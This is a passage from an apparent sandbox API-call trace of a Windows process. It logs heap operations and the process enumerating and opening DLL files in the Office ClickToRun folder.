returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0074.088] AreFileApisANSI () returned 1 [0074.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x5a6b8 [0074.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll") returned 91 [0074.088] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-synch-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0074.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.088] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="AP7902~1.DLL")) returned 1 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0074.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.089] AreFileApisANSI () returned 1 [0074.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 94 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.089] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.089] AreFileApisANSI () returned 1 [0074.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0074.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x5a6b8 [0074.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0074.090] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.090] GetFileType (hFile=0x42c) returned 0x1 [0074.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.090] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.091] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.091] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.091] CloseHandle (hObject=0x42c) returned 1 [0074.091] AreFileApisANSI () returned 1 [0074.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0074.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x5a6b8 [0074.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0074.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.091] GetFileType (hFile=0x42c) returned 0x1 [0074.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.091] CloseHandle (hObject=0x42c) returned 1 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0074.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.093] AreFileApisANSI () returned 1 [0074.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x5a6b8 [0074.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=94 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 94 [0074.093] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.093] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.093] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="APA632~1.DLL")) returned 1 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.094] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.094] AreFileApisANSI () returned 1 [0074.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0074.094] RtlAllocateHeap 